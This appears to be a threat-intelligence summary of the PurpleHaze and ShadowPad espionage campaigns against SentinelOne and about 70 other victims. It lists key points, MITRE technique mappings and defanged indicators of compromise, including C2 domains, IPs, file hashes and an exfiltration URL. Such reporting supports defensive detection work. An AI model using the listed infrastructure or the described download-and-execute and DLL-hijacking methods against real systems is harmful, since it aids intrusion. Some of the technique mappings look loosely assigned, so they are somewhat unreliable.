SentinelLABS detected and thwarted reconnaissance and intrusion operations linked to the PurpleHaze and ShadowPad activity clusters, attributed with high confidence to China-nexus threat actors targeting SentinelOne and related organizations. Despite multiple sophisticated attacks between 2024 and 2025, SentinelOne’s infrastructure remained uncompromised, underscoring persistent threats to cybersecurity vendors and global industries. #PurpleHaze #ShadowPad #GOREshell #APT15 #UNC5174
Keypoints
- SentinelLABS identified and disrupted reconnaissance targeting SentinelOne in October 2024 and a ShadowPad-linked intrusion in early 2025 affecting an IT logistics firm managing SentinelOne hardware.
- The PurpleHaze and ShadowPad clusters involved over 70 victims globally, including government, media, manufacturing, finance, telecom, and research sectors.
- High confidence attribution links the activities to China-nexus cyberespionage actors, including groups overlapping with APT15 and UNC5174.
- ShadowPad malware samples were obfuscated using ScatterBrain variants, and their infrastructure included multiple C2 domains associated with global intrusions from July 2024 to March 2025.
- PurpleHaze operations utilized GOREshell backdoors exploiting CVE-2024-8963 and CVE-2024-8190 vulnerabilities, employing China-based ORB network infrastructure for stealth and persistence.
- The threat actors employed open-source tools from The Hacker’s Choice community and reused private SSH keys across multiple malware variants and platforms.
- Continuous monitoring, threat intelligence sharing, and proactive defense helped SentinelOne prevent compromise despite targeted attacks.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – PowerShell commands used to deploy ShadowPad malware (“Downloads a file named x.dat from a remote endpoint…” and executes it).
- [T1566] Phishing – Initial intrusion often involved exploitation of vulnerabilities in network devices such as Check Point gateways.
- [T1071] Application Layer Protocol – ShadowPad used DNS over HTTPS and WebSocket protocols for C2 communication (“leveraging DNS over HTTPS (DoH)…”).
- [T1036] Masquerading – Malicious DLL (glib-2.0.dll) masquerading as legitimate GLib–2.0 library to bypass detection.
- [T1027] Obfuscated Files or Information – ShadowPad and GOREshell samples were obfuscated using ScatterBrain, Garbage (Garble), and UPX packing techniques (“obfuscated using Garble…” and “packed with UPX”).
- [T1505] Server Software Component – Deployment of malicious DLL files loaded by legitimate executables vulnerable to DLL hijacking (“Windows DLLs designed to be loaded by specific legitimate executables vulnerable to DLL hijacking”).
- [T1105] Ingress Tool Transfer – Download of malware components from attacker-controlled servers (“downloaded an archive file named VGAuth1.zip from 103.248.61[.]36”).
- [T1110] Brute Force – SSH private key reuse observed across multiple malware variants to maintain persistence.
- [T1033] System Owner/User Discovery – Use of Windows commands like ipconfig for network reconnaissance (“executed the ipconfig Windows command…”).
Indicators of Compromise
- [File Hash] Malware and tools – AppSov.exe ShadowPad sample (f52e18b7c8417c7573125c0047adb32d8d813529), GOREshell components (411180c89953ab5e0c59bd4b835eef740b550823, 7dabf87617d646a9ec3e135b5f0e5edae50cd3b9), Nimbo-C2 agent PfSvc.exe (4896cfff334f846079174d3ea2d541eec72690a0), webshell (106248206f1c995a76058999ccd6a6d0f420461e), and others.
- [Domain] C2 and infrastructure domains – downloads.trendav[.]vip, cloud.trendav[.]co, epp.navy[.]ddns[.]info, dscriy.chtq[.]net, mail.secmailbox[.]us, sentinelxdr[.]us, tatacom.duckdns[.]org, and trendav[.]vip among others linked to PurpleHaze and ShadowPad operations.
- [IP Address] Malicious infrastructure – 142.93.214[.]219 (GOREshell C2), 65.38.120[.]110 (ShadowPad C2), 103.248.61[.]36 (malware hosting), 107.173.111[.]26 (GOREshell C2 server), 128.199.124[.]136 (C2 proxy server), and 45.13.199[.]209 (exfiltration endpoint).
- [URL] Exfiltration and C2 endpoints – https://45.13.199[.]209/rss/rss.php (data exfiltration URL).
Views: 39